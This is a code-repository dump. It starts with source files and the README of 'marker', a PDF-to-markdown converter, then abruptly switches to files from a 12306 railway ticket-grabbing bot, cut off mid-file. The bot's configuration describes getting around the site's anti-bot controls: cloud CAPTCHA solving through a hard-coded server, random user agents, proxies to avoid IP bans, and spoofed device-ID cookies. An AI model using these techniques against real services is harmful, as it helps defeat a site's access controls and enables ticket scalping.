s.text.strip()] return spans def get_font_sizes(self): font_sizes = [s.font_size for s in self.get_nonblank_spans()] return font_sizes def get_line_heights(self): heights = [l.bbox[3] - l.bbox[1] for l in self.get_nonblank_lines()] return heights @property def prelim_text(self): return "\n".join([b.prelim_text for b in self.blocks]) File: marker/schema/merged.py from collections import Counter from typing import List, Optional from pydantic import BaseModel from marker.schema.bbox import BboxElement class MergedLine(BboxElement): text: str fonts: List[str] def most_common_font(self): counter = Counter(self.fonts) return counter.most_common(1)[0][0] class MergedBlock(BboxElement): lines: List[MergedLine] pnum: int block_type: Optional[str] class FullyMergedBlock(BaseModel): text: str block_type: str File: marker/schema/block.py import math from typing import List, Optional from pydantic import field_validator import ftfy from marker.schema.bbox import BboxElement from marker.settings import settings class BlockType(BboxElement): block_type: str class Span(BboxElement): text: str span_id: str font: str font_weight: float font_size: float bold: Optional[bool] = None italic: Optional[bool] = None image: Optional[bool] = None @field_validator('text') @classmethod def fix_unicode(cls, text: str) -> str: return ftfy.fix_text(text) class Line(BboxElement): spans: List[Span] @property def prelim_text(self): return "".join([s.text for s in self.spans]) @property def start(self): return self.spans[0].bbox[0] class Block(BboxElement): lines: List[Line] pnum: int block_type: Optional[str] = None @property def prelim_text(self): return "\n".join([l.prelim_text for l in self.lines]) def filter_spans(self, bad_span_ids): new_lines = [] for line in self.lines: new_spans = [] 
for span in line.spans: if not span.span_id in bad_span_ids: new_spans.append(span) line.spans = new_spans if len(new_spans) > 0: new_lines.append(line) self.lines = new_lines def filter_bad_span_types(self): new_lines = [] for line in self.lines: new_spans = [] for span in line.spans: if self.block_type not in settings.BAD_SPAN_TYPES: new_spans.append(span) line.spans = new_spans if len(new_spans) > 0: new_lines.append(line) self.lines = new_lines def get_min_line_start(self): line_starts = [line.start for line in self.lines] if len(line_starts) == 0: return None return min(line_starts) def bbox_from_lines(lines: List[Line]): min_x = min([line.bbox[0] for line in lines]) min_y = min([line.bbox[1] for line in lines]) max_x = max([line.bbox[2] for line in lines]) max_y = max([line.bbox[3] for line in lines]) return [min_x, min_y, max_x, max_y] def split_block_lines(block: Block, split_line_idx: int): new_blocks = [] if split_line_idx >= len(block.lines): return [block] elif split_line_idx == 0: return [block] else: new_blocks.append(Block(lines=block.lines[:split_line_idx], bbox=bbox_from_lines(block.lines[:split_line_idx]), pnum=block.pnum)) new_blocks.append(Block(lines=block.lines[split_line_idx:], bbox=bbox_from_lines(block.lines[split_line_idx:]), pnum=block.pnum)) return new_blocks def find_insert_block(blocks: List[Block], bbox): nearest_match = None match_dist = None for idx, block in enumerate(blocks): try: dist = math.sqrt((block.bbox[1] - bbox[1]) ** 2 + (block.bbox[0] - bbox[0]) ** 2) except Exception as e: continue if nearest_match is None or dist < match_dist: nearest_match = idx match_dist = dist if nearest_match is None: return 0 return nearest_match File: marker/schema/bbox.py from typing import List from pydantic import BaseModel, field_validator def should_merge_blocks(box1, box2, tol=5): # Within tol y px, and to the right within tol px merge = [ box2[0] > box1[0], # After in the x coordinate abs(box2[1] - box1[1]) < tol, # Within tol y px abs(box2[3] - box1[3]) < tol, # Within tol y px abs(box2[0] - box1[2]) < tol, # Within tol x px ] return all(merge) def merge_boxes(box1, box2): return (min(box1[0], box2[0]), min(box1[1], box2[1]), max(box2[2], box1[2]), max(box1[3], box2[3])) def boxes_intersect(box1, box2): # Box1 intersects box2 return box1[0] < box2[2] and box1[2] > box2[0] and box1[1] < box2[3] and box1[3] > box2[1] def box_intersection_pct(box1, box2): # determine the coordinates of the intersection rectangle x_left = max(box1[0], box2[0]) y_top = max(box1[1], box2[1]) x_right = min(box1[2], box2[2]) y_bottom = min(box1[3], box2[3]) if x_right < x_left or y_bottom < y_top: return 0.0 intersection_area = (x_right - x_left) * (y_bottom - y_top) bb1_area = (box1[2] - box1[0]) * (box1[3] - box1[1]) if bb1_area == 0: return 0.0 iou = intersection_area / bb1_area return iou def multiple_boxes_intersect(box1, boxes): for box2 in boxes: if boxes_intersect(box1, box2): return True return False def unnormalize_box(bbox, width, height): return [ width * (bbox[0] / 1000), height * (bbox[1] / 1000), width * (bbox[2] / 1000), height * (bbox[3] / 1000), ] class BboxElement(BaseModel): bbox: List[float] @field_validator('bbox') @classmethod def check_4_elements(cls, v: List[float]) -> List[float]: if len(v) != 4: raise ValueError('bbox must have 4 elements') return v @property def height(self): return self.bbox[3] - self.bbox[1] @property def width(self): return self.bbox[2] - self.bbox[0] @property def x_start(self): return self.bbox[0] @property def y_start(self): return 
self.bbox[1] @property def area(self): return self.width * self.height def intersection_pct(self, other_bbox: List[float]): if self.area == 0: return 0.0 return box_intersection_pct(self.bbox, other_bbox) def rescale_bbox(orig_dim, new_dim, bbox): page_width, page_height = new_dim[2] - new_dim[0], new_dim[3] - new_dim[1] detected_width, detected_height = orig_dim[2] - orig_dim[0], orig_dim[3] - orig_dim[1] width_scaler = detected_width / page_width height_scaler = detected_height / page_height new_bbox = [bbox[0] / width_scaler, bbox[1] / height_scaler, bbox[2] / width_scaler, bbox[3] / height_scaler] return new_bbox File: marker/debug/data.py import base64 import json import os from typing import List from marker.pdf.images import render_image from marker.schema.page import Page from marker.settings import settings from PIL import Image import io def dump_equation_debug_data(doc, images, converted_spans): if not settings.DEBUG_DATA_FOLDER or settings.DEBUG_LEVEL == 0: return if len(images) == 0: return # We attempted one conversion per image assert len(converted_spans) == len(images) data_lines = [] for idx, (pil_image, converted_span) in enumerate(zip(images, converted_spans)): if converted_span is None: continue # Image is a BytesIO object img_bytes = io.BytesIO() pil_image.save(img_bytes, format="WEBP", lossless=True) b64_image = base64.b64encode(img_bytes.getvalue()).decode("utf-8") data_lines.append({ "image": b64_image, "text": converted_span.text, "bbox": converted_span.bbox }) # Remove extension from doc name doc_base = os.path.basename(doc.name).rsplit(".", 1)[0] debug_file = os.path.join(settings.DEBUG_DATA_FOLDER, f"{doc_base}_equations.json") with open(debug_file, "w+") as f: json.dump(data_lines, f) def dump_bbox_debug_data(doc, fname, blocks: List[Page]): if not settings.DEBUG_DATA_FOLDER or settings.DEBUG_LEVEL < 2: return # Remove extension from doc name doc_base = fname.rsplit(".", 1)[0] debug_file = os.path.join(settings.DEBUG_DATA_FOLDER, f"{doc_base}_bbox.json") debug_data = [] for idx, page_blocks in enumerate(blocks): page = doc[idx] png_image = render_image(page, dpi=settings.TEXIFY_DPI) width, height = png_image.size max_dimension = 6000 if width > max_dimension or height > max_dimension: scaling_factor = min(max_dimension / width, max_dimension / height) png_image = png_image.resize((int(width * scaling_factor), int(height * scaling_factor)), Image.ANTIALIAS) img_bytes = io.BytesIO() png_image.save(img_bytes, format="WEBP", lossless=True, quality=100) b64_image = base64.b64encode(img_bytes.getvalue()).decode("utf-8") page_data = page_blocks.model_dump() page_data["image"] = b64_image debug_data.append(page_data) with open(debug_file, "w+") as f: json.dump(debug_data, f)
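The helpers at the heart of the schema code above, `rescale_bbox` and `box_intersection_pct` from `marker/schema/bbox.py`, do the coordinate plumbing for the OCR, layout, and equation code: boxes detected on a rendered image have to be mapped back into pdf-page coordinates before they can be compared with extracted text lines. A minimal usage sketch with made-up numbers, assuming the `marker` package from this repo is importable:

```python
# Illustrative only: the page dimensions and boxes below are invented for the example.
from marker.schema.bbox import box_intersection_pct, rescale_bbox

# A detector ran on a 1000x2000 rendered image, but the pdf page is 500x1000,
# so detected boxes must be rescaled before comparing them to pdf text lines.
layout_image_bbox = [0, 0, 1000, 2000]
pdf_page_bbox = [0, 0, 500, 1000]
detected_box = [100, 200, 300, 400]

rescaled = rescale_bbox(layout_image_bbox, pdf_page_bbox, detected_box)
print(rescaled)  # [50.0, 100.0, 150.0, 200.0]

# box_intersection_pct returns the fraction of the *first* box covered by the
# intersection; detected_line_coverage uses this to decide whether a detected
# line already has extracted text behind it.
line_box = [100, 150, 250, 300]
print(box_intersection_pct(rescaled, line_box))  # 0.25
```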
# Marker

Marker converts PDF to markdown quickly and accurately.

- Supports a wide range of documents (optimized for books and scientific papers)
- Supports all languages
- Removes headers/footers/other artifacts
- Formats tables and code blocks
- Extracts and saves images along with the markdown
- Converts most equations to LaTeX
- Works on GPU, CPU, or MPS

## How it works

Marker is a pipeline of deep learning models:

- Extract text, OCR if necessary (heuristics, [surya](https://github.com/VikParuchuri/surya), tesseract)
- Detect page layout and find reading order ([surya](https://github.com/VikParuchuri/surya))
- Clean and format each block (heuristics, [texify](https://github.com/VikParuchuri/texify))
- Combine blocks and postprocess complete text (heuristics, [pdf_postprocessor](https://huggingface.co/vikp/pdf_postprocessor_t5))

It only uses models where necessary, which improves speed and accuracy.

## Examples

| PDF | Type | Marker | Nougat |
|-----|------|--------|--------|
| [Think Python](https://greenteapress.com/thinkpython/thinkpython.pdf) | Textbook | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/thinkpython.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/thinkpython.md) |
| [Think OS](https://greenteapress.com/thinkos/thinkos.pdf) | Textbook | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/thinkos.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/thinkos.md) |
| [Switch Transformers](https://arxiv.org/pdf/2101.03961.pdf) | arXiv paper | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/switch_transformers.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/switch_transformers.md) |
| [Multi-column CNN](https://arxiv.org/pdf/1804.07821.pdf) | arXiv paper | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/marker/multicolcnn.md) | [View](https://github.com/VikParuchuri/marker/blob/master/data/examples/nougat/multicolcnn.md) |

## Performance

![Benchmark overall](data/images/overall.png)

The above results are with marker and nougat setup so they each take ~4GB of VRAM on an A6000.

See [below](#benchmarks) for detailed speed and accuracy benchmarks, and instructions on how to run your own benchmarks.

# Commercial usage

I want marker to be as widely accessible as possible, while still funding my development/training costs.

Research and personal usage is always okay, but there are some restrictions on commercial usage.

The weights for the models are licensed `cc-by-nc-sa-4.0`, but I will waive that for any organization under $5M USD in gross revenue in the most recent 12-month period AND under $5M in lifetime VC/angel funding raised.

If you want to remove the GPL license requirements (dual-license) and/or use the weights commercially over the revenue limit, check out the options [here](https://www.datalab.to).
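To make the pipeline described under "How it works" concrete, here is a rough sketch wired together only from the modules excerpted in this repo dump. It is not the library's official entry point: model loading and the layout/reading-order pass are not part of the excerpt, so the already-loaded models are passed in as arguments and the missing pass is marked with a comment.

```python
# Sketch under stated assumptions: marker is installed, and det_model, rec_model,
# texify_model, and edit_model have been loaded elsewhere (model loading is not
# shown in the excerpted files).
import pypdfium2 as pdfium

from marker.equations.equations import replace_equations
from marker.ocr.detection import surya_detection
from marker.ocr.recognition import run_ocr
from marker.pdf.extract_text import get_text_blocks
from marker.postprocessors.editor import edit_full_text
from marker.postprocessors.markdown import get_full_text, merge_lines, merge_spans


def convert_pdf_sketch(fname, det_model, rec_model, texify_model, edit_model, langs=("English",)):
    doc = pdfium.PdfDocument(fname)

    # 1. Pull text and bboxes out of the pdf with pdftext
    pages, toc = get_text_blocks(doc, fname)

    # 2. Detect text lines, then OCR only the pages that need it
    surya_detection(doc, pages, det_model)
    pages, ocr_stats = run_ocr(doc, pages, list(langs), rec_model)

    # (the layout + reading-order pass runs here in the real pipeline; that
    #  module is not part of this excerpt, and replace_equations relies on it)

    # 3. Convert detected formula regions to LaTeX with texify
    pages, eq_stats = replace_equations(doc, pages, texify_model)

    # 4. Merge spans/lines/blocks into markdown and post-process the text
    text_blocks = merge_lines(merge_spans(pages))
    full_text = get_full_text(text_blocks)
    full_text, edit_stats = edit_full_text(full_text, edit_model)
    return full_text
```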
# Hosted API

There's a hosted API for marker available [here](https://www.datalab.to/):

- Supports PDFs, Word documents, and PowerPoints
- 1/4th the price of leading cloud-based competitors
- Leverages [Modal](https://modal.com/) for high reliability without latency spikes

# Community

[Discord](https://discord.gg//KuZwXNGnfH) is where we discuss future development.

# Limitations

PDF is a tricky format, so marker will not always work perfectly. Here are some known limitations that are on the roadmap to address:

- Marker will not convert 100% of equations to LaTeX. This is because it has to detect the equations first, then convert them.
- Tables are not always formatted 100% correctly - text can be in the wrong column.
- Whitespace and indentations are not always respected.
- Not all lines/spans will be joined properly.
- This works best on digital PDFs that won't require a lot of OCR. It's optimized for speed, and limited OCR is used to fix errors.

# Installation

You'll need python 3.9+ and PyTorch. You may need to install the CPU version of torch first if you're not using a Mac or a GPU machine. See [here](https://pytorch.org/get-started/locally/) for more details.

Install with:

```shell
pip install marker-pdf
```

## Optional: OCRMyPDF

Only needed if you want to use `ocrmypdf` as the OCR backend. Note that `ocrmypdf` includes Ghostscript, an AGPL dependency, but calls it via CLI, so it does not trigger the license provisions.

See the instructions [here](docs/install_ocrmypdf.md).

# Usage

First, some configuration:

- Inspect the settings in `marker/settings.py`. You can override any settings with environment variables.
- Your torch device will be automatically detected, but you can override this. For example, `TORCH_DEVICE=cuda`.
- By default, marker will use `surya` for OCR. Surya is slower on CPU, but more accurate than tesseract. It also doesn't require you to specify the languages in the document. If you want faster OCR, set `OCR_ENGINE` to `ocrmypdf`. This also requires external dependencies (see above). If you don't want OCR at all, set `OCR_ENGINE` to `None`.

## Interactive App

I've included a streamlit app that lets you interactively try marker with some basic options. Run it with:

```shell
pip install streamlit
marker_gui
```

## Convert a single file

```shell
marker_single /path/to/file.pdf /path/to/output/folder --batch_multiplier 2 --max_pages 10
```

- `--batch_multiplier` is how much to multiply default batch sizes by if you have extra VRAM. Higher numbers will take more VRAM, but process faster. Set to 2 by default. The default batch sizes will take ~3GB of VRAM.
- `--max_pages` is the maximum number of pages to process. Omit this to convert the entire document.
- `--langs` is an optional comma separated list of the languages in the document, for OCR. Optional by default, required if you use tesseract.
- `--ocr_all_pages` is an optional argument to force OCR on all pages of the PDF. If this or the env var `OCR_ALL_PAGES` are true, OCR will be forced.

The list of supported languages for surya OCR is [here](https://github.com/VikParuchuri/surya/blob/master/surya/languages.py). If you need more languages, you can use any language supported by [Tesseract](https://tesseract-ocr.github.io/tessdoc/Data-Files#data-files-for-version-400-november-29-2016) if you set `OCR_ENGINE` to `ocrmypdf`. If you don't need OCR, marker can work with any language.
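Since `--batch_multiplier` simply scales each stage's default batch size, a quick way to see what a given value means on your machine is to query the per-stage `get_batch_size()` helpers excerpted earlier in this dump. A small sketch, assuming marker is installed; the defaults it prints depend on your torch device and any `*_BATCH_SIZE` settings you have overridden:

```python
# Illustrative sketch: prints the effective per-stage batch size for a given
# --batch_multiplier value, using the get_batch_size() helpers shown above.
from marker.equations import inference
from marker.ocr import detection, recognition
from marker.postprocessors import editor

batch_multiplier = 2  # same meaning as `marker_single ... --batch_multiplier 2`

stages = [
    ("text detection", detection),
    ("OCR recognition", recognition),
    ("equation texify", inference),
    ("editor model", editor),
]
for name, module in stages:
    print(f"{name}: {module.get_batch_size() * batch_multiplier}")
```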
## Convert multiple files

```shell
marker /path/to/input/folder /path/to/output/folder --workers 4 --max 10 --min_length 10000
```

- `--workers` is the number of pdfs to convert at once. This is set to 1 by default, but you can increase it to increase throughput, at the cost of more CPU/GPU usage. Marker will use 5GB of VRAM per worker at the peak, and 3.5GB average.
- `--max` is the maximum number of pdfs to convert. Omit this to convert all pdfs in the folder.
- `--min_length` is the minimum number of characters that need to be extracted from a pdf before it will be considered for processing. If you're processing a lot of pdfs, I recommend setting this to avoid OCRing pdfs that are mostly images, since OCR slows everything down.
- `--metadata_file` is an optional path to a json file with metadata about the pdfs. If you provide it, it will be used to set the language for each pdf. Setting language is optional for surya (default), but required for tesseract. The format is:

```
{
  "pdf1.pdf": {"languages": ["English"]},
  "pdf2.pdf": {"languages": ["Spanish", "Russian"]},
  ...
}
```

You can use language names or codes. The exact codes depend on the OCR engine. See [here](https://github.com/VikParuchuri/surya/blob/master/surya/languages.py) for a full list for surya codes, and [here](https://tesseract-ocr.github.io/tessdoc/Data-Files#data-files-for-version-400-november-29-2016) for tesseract.

## Convert multiple files on multiple GPUs

```shell
MIN_LENGTH=10000 METADATA_FILE=../pdf_meta.json NUM_DEVICES=4 NUM_WORKERS=15 marker_chunk_convert ../pdf_in ../md_out
```

- `METADATA_FILE` is an optional path to a json file with metadata about the pdfs. See above for the format.
- `NUM_DEVICES` is the number of GPUs to use. Should be `2` or greater.
- `NUM_WORKERS` is the number of parallel processes to run on each GPU.
- `MIN_LENGTH` is the minimum number of characters that need to be extracted from a pdf before it will be considered for processing. If you're processing a lot of pdfs, I recommend setting this to avoid OCRing pdfs that are mostly images, since OCR slows everything down.

Note that the env variables above are specific to this script, and cannot be set in `local.env`.

# Troubleshooting

There are some settings that you may find useful if things aren't working the way you expect:

- `OCR_ALL_PAGES` - set this to true to force OCR on all pages. This can be very useful if the table layouts aren't recognized properly by default, or if there is garbled text.
- `TORCH_DEVICE` - set this to force marker to use a given torch device for inference.
- `OCR_ENGINE` - can set this to `surya` or `ocrmypdf`.
- `DEBUG` - setting this to `True` shows ray logs when converting multiple pdfs.
- Verify that you set the languages correctly, or passed in a metadata file.
- If you're getting out of memory errors, decrease worker count (increase the `VRAM_PER_TASK` setting). You can also try splitting up long PDFs into multiple files.

In general, if output is not what you expect, trying to OCR the PDF is a good first step. Not all PDFs have good text/bboxes embedded in them.

## Useful settings

These settings can improve/change output quality:

- `OCR_ALL_PAGES` will force OCR across the document. Many PDFs have bad text embedded due to older OCR engines being used.
- `PAGINATE_OUTPUT` will put a horizontal rule between pages. Default: False.
- `EXTRACT_IMAGES` will extract images and save separately. Default: True.
- `BAD_SPAN_TYPES` specifies layout blocks to remove from the markdown output.
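The troubleshooting list above suggests double-checking your languages; the helpers in `marker/ocr/lang.py` excerpted earlier do the normalization from language names (as used in a metadata file or `--langs`) to engine-specific codes, and you can run them directly. A small sketch, assuming marker is installed and `OCR_ENGINE` is left at its `surya` default; the exact codes come from surya's language table:

```python
# Illustrative: the metadata below mirrors the format documented above.
import json

from marker.ocr.lang import replace_langs_with_codes, validate_langs

metadata = json.loads('{"pdf2.pdf": {"languages": ["Spanish", "Russian"]}}')
langs = metadata["pdf2.pdf"]["languages"]

langs = replace_langs_with_codes(langs)  # names -> surya codes (e.g. "Spanish" -> "es")
validate_langs(langs)                    # raises ValueError for unknown codes
print(langs)
```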
# Benchmarks

Benchmarking PDF extraction quality is hard. I've created a test set by finding books and scientific papers that have a pdf version and a latex source. I convert the latex to text, and compare the reference to the output of text extraction methods. It's noisy, but at least directionally correct.

Benchmarks show that marker is 4x faster than nougat, and more accurate outside arXiv (nougat was trained on arXiv data). We show naive text extraction (pulling text out of the pdf with no processing) for comparison.

**Speed**

| Method | Average Score | Time per page | Time per document |
|--------|---------------|---------------|-------------------|
| marker | 0.613721 | 0.631991 | 58.1432 |
| nougat | 0.406603 | 2.59702 | 238.926 |

**Accuracy**

The thinkpython, thinkos, and thinkdsp columns are books; multicolcnn and switch_trans are arXiv papers.

| Method | multicolcnn.pdf | switch_trans.pdf | thinkpython.pdf | thinkos.pdf | thinkdsp.pdf | crowd.pdf |
|--------|-----------------|------------------|-----------------|-------------|--------------|-----------|
| marker | 0.536176 | 0.516833 | 0.70515 | 0.710657 | 0.690042 | 0.523467 |
| nougat | 0.44009 | 0.588973 | 0.322706 | 0.401342 | 0.160842 | 0.525663 |

Peak GPU memory usage during the benchmark is `4.2GB` for nougat, and `4.1GB` for marker. Benchmarks were run on an A6000 Ada.

**Throughput**

Marker takes about 4GB of VRAM on average per task, so you can convert 12 documents in parallel on an A6000.

![Benchmark results](data/images/per_doc.png)

## Running your own benchmarks

You can benchmark the performance of marker on your machine. Install marker manually with:

```shell
git clone https://github.com/VikParuchuri/marker.git
poetry install
```

Download the benchmark data [here](https://drive.google.com/file/d/1ZSeWDo2g1y0BRLT7KnbmytV2bjWARWba/view?usp=sharing) and unzip. Then run the overall benchmark like this:

```shell
python benchmark/overall.py data/pdfs data/references report.json --nougat
```

This will benchmark marker against other text extraction methods. It sets up batch sizes for nougat and marker to use a similar amount of GPU RAM for each.

Omit `--nougat` to exclude nougat from the benchmark. I don't recommend running nougat on CPU, since it is very slow.

### Table benchmark

There is a benchmark for table parsing, which you can run with:

```shell
python benchmarks/table.py test_data/tables.json
```

# Thanks

This work would not have been possible without amazing open source models and datasets, including (but not limited to):

- Surya
- Texify
- Pypdfium2/pdfium
- DocLayNet from IBM
- ByT5 from Google

Thank you to the authors of these models and datasets for making them available to the community!
12306
a495af88346a0d794493c6030f6a6207debb5824
File: run.py # -*- coding=utf-8 -*- import argparse import sys def parser_arguments(argv): """ 不应该在这里定义,先放在这里 :param argv: :return: """ parser = argparse.ArgumentParser() parser.add_argument("operate", type=str, help="r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱需要打开开关") return parser.parse_args(argv) if __name__ == '__main__': args = parser_arguments(sys.argv[1:]) if args.operate == "r": from init import select_ticket_info select_ticket_info.select().main() elif args.operate == "t": from config.emailConf import sendEmail from config.serverchanConf import sendServerChan sendEmail(u"订票小助手测试一下") sendServerChan("订票小助手测试一下") elif args.operate == "c": from agency.cdn_utils import filterCdn filterCdn() File: TickerConfig.py # -*- coding=utf-8 -*- # 关于软件使用配置说明,一定要看!!! # ps: 如果是候补车票,需要通过人证一致性核验的用户及激活的“铁路畅行”会员可以提交候补需求,请您按照操作说明在铁路12306app.上完成人证核验 # 关于候补了之后是否还能继续捡漏的问题在此说明: 软件为全自动候补加捡漏,如果软件候补成功则会停止抢票,发出邮件通知,但是不会影响你继续捡漏, # 如果这个时候捡漏捡到的话,也是可以付款成功的,也就是说,捡漏+候补,可以最大程度提升抢票成功率 # 刷票模式:1=刷票 2=候补+刷票 TICKET_TYPE = 1 # 出发日期(list) "2018-01-06", "2018-01-07" STATION_DATES = [ "2020-01-18" ] # 填入需要购买的车次(list),"G1353" # 修改车次填入规则,注:(以前设置的车次逻辑不变),如果车次填入为空,那么就是当日乘车所有车次都纳入筛选返回 # 不填车次是整个list为空才算,如果不是为空,依然会判断车次的,这种是错误的写法 [""], 正确的写法 [] STATION_TRAINS = [] # 出发城市,比如深圳北,就填深圳就搜得到 FROM_STATION = "广州南" # 到达城市 比如深圳北,就填深圳就搜得到 TO_STATION = "隆回" # 座位(list) 多个座位ex: # "商务座", # "一等座", # "二等座", # "特等座", # "软卧", # "硬卧", # "硬座", # "无座", # "动卧", SET_TYPE = ["二等座"] # 当余票小于乘车人,如果选择优先提交,则删减联系人和余票数一致在提交 # bool IS_MORE_TICKET = True # 乘车人(list) 多个乘车人ex: # "张三", # "李四" TICKET_PEOPLES = [] # 12306登录账号 USER = "" PWD = "" # 加入小黑屋时间默认为5分钟,此功能为了防止僵尸票导致一直下单不成功错过正常的票 TICKET_BLACK_LIST_TIME = 5 # 自动打码 IS_AUTO_CODE = True # 设置2本地自动打码,需要配置tensorflow和keras库,3为云打码,由于云打码服务器资源有限(为2h4C的cpu服务器),请不要恶意请求,不然只能关闭服务器 # ps: 请不要一直依赖云服务器资源,在此向所有提供服务器同学表示感谢 AUTO_CODE_TYPE = 3 # 此处设置云打码服务器地址,如果有自建的服务器,可以自行更改 HOST = "120.77.154.140:8000" REQ_URL = "/verify/base64/" HTTP_TYPE = "http" # HOST="12306.yinaoxiong.cn" #备用服务器稳定性较差 # REQ_URL="/verify/base64/" # HTTP_TYPE="https" # 邮箱配置,如果抢票成功,将通过邮件配置通知给您 # 列举163 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "xxxxx # host: "smtp.163.com" # 列举qq ,qq设置比较复杂,需要在邮箱-->账户-->开启smtp服务,取得授权码==邮箱登录密码 # email: "[email protected]" # notice_email_list: "[email protected]" # username: "xxxxx" # password: "授权码" # host: "smtp.qq.com" EMAIL_CONF = { "IS_MAIL": True, "email": "", "notice_email_list": "", "username": "", "password": "", "host": "smtp.qq.com", } # 是否开启 server酱 微信提醒, 使用前需要前往 http://sc.ftqq.com/3.version 扫码绑定获取 SECRET 并关注获得抢票结果通知的公众号 SERVER_CHAN_CONF = { "is_server_chan": False, "secret": "" } # 是否开启cdn查询,可以更快的检测票票 1为开启,2为关闭 IS_CDN = 1 # 下单接口分为两种,1 模拟网页自动捡漏下单(不稳定),2 模拟车次后面的购票按钮下单(稳如老狗) ORDER_TYPE = 2 # 下单模式 1 为预售,整点刷新,刷新间隔0.1-0.5S, 然后会校验时间,比如12点的预售,那脚本就会在12.00整检票,刷新订单 # 2 是捡漏,捡漏的刷新间隔时间为0.5-3秒,时间间隔长,不容易封ip ORDER_MODEL = 1 # 是否开启代理, 0代表关闭, 1表示开始 # 开启此功能的时候请确保代理ip是否可用,在测试放里面经过充分的测试,再开启此功能,不然可能会耽误你购票的宝贵时间 # 使用方法: # 1、在agency/proxy_list列表下填入代理ip # 2、测试UnitTest/TestAll/testProxy 测试代理是否可以用 # 3、开启代理ip IS_PROXY = 0 # 预售放票时间, 如果是捡漏模式,可以忽略此操作 OPEN_TIME = "12:59:57" # 1=使用selenium获取devicesID # 2=使用网页端/otn/HttpZF/logdevice获取devicesId,这个接口的算法目前可能有点问题,如果登录一直302的请改为配置1 # 3=自己打开浏览器在headers-Cookies中抓取RAIL_DEVICEID和RAIL_EXPIRATION,这个就不用配置selenium COOKIE_TYPE = 3 # 如果COOKIE_TYPE=1,则需配置chromeDriver路径,下载地址http://chromedriver.storage.googleapis.com/index.html # chromedriver配置版本只要和chrome的大版本匹配就行 CHROME_PATH = "/usr/src/app/chromedriver" # 为了docker37 准备的环境变量,windows环境可以不用管这个参数 CHROME_CHROME_PATH = 
"/opt/google/chrome/google-chrome" # 如果COOKIE_TYPE=3, 则需配置RAIL_EXPIRATION、RAIL_DEVICEID的值 RAIL_EXPIRATION = "" RAIL_DEVICEID = "" # RAIL_EXPIRATION = "1577034103293" # RAIL_DEVICEID = "CDno29Erc_Pf3FSXb4dzq-Op64EhWrsi5yUZKVIKR1MAfYo2qFlCeXD8VkexY7_1qg-ClV-fE8j9jgVlPZxRh3wVc2iqLe_5A8sdr62qZx4B22JPF8lFCjpgTKZ5ODW90HJd5tiQsJ1KR9nOqHRxHj1FT5LEIwfw" # 1=>为一直随机ua,2->只启动的时候随机一次ua RANDOM_AGENT = 2 PASSENGER_TICKER_STR = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } # 保护12306官网请求频率,设置随机请求时间,原则为5分钟不大于80次 # 最大间隔请求时间 MAX_TIME = 3 # 最小间隔请求时间 MIN_TIME = 1 # 软件版本 RE_VERSION = "1.2.004" File: __init__.py File: init/__init__.py File: init/select_ticket_info.py # -*- coding=utf-8 -*- import datetime import random import os import socket import sys import threading import time import TickerConfig import wrapcache from agency.cdn_utils import CDNProxy, open_cdn_file from config import urlConf, configCommon from config.TicketEnmu import ticket from config.configCommon import seat_conf_2, seat_conf from config.getCookie import getDrvicesID from init.login import GoLogin from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest from inter.ChechFace import chechFace from inter.CheckUser import checkUser from inter.GetPassengerDTOs import getPassengerDTOs from inter.LiftTicketInit import liftTicketInit from inter.Query import query from inter.SubmitOrderRequest import submitOrderRequest from myException.PassengerUserException import PassengerUserException from myException.UserPasswordException import UserPasswordException from myException.ticketConfigException import ticketConfigException from myException.ticketIsExitsException import ticketIsExitsException from myException.ticketNumOutException import ticketNumOutException from myUrllib.httpUtils import HTTPClient class select: """ 快速提交车票通道 """ def __init__(self): self.cdn_list = open_cdn_file("filter_cdn_list") self.get_ticket_info() self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE] self.auto_code_type = TickerConfig.AUTO_CODE_TYPE self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list) self.httpClint.cdn = self.cdn_list[random.randint(0, 4)] self.urls = urlConf.urls self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type) self.cookies = "" self.queryUrl = "leftTicket/queryO" self.passengerTicketStrList = "" self.passengerTicketStrByAfterLate = "" self.oldPassengerStr = "" self.set_type = "" self.flag = True @staticmethod def get_ticket_info(): """ 获取配置信息 :return: """ print(u"*" * 50) print(f"检查当前版本为: {TickerConfig.RE_VERSION}") version = sys.version.split(" ")[0] print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version)) if version < "3.6.0": raise Exception print(u"12306刷票小助手,最后更新于2019.09.18,请勿作为商业用途,交流群号:" u" 1群:286271084(已满)\n" u" 2群:649992274(已满)\n" u" 3群:632501142(已满)\n" u" 4群: 606340519(已满)\n" u" 5群: 948526733(已满)\n" u" 7群: 660689659(已满)\n" u" 8群: 620629239(已满)\n" u" 6群: 608792930(未满)\n" u" 9群: 693035807(未满)\n" ) print( f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \ f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}") print(u"*" * 50) def station_table(self, from_station, to_station): """ 读取车站信息 :param 
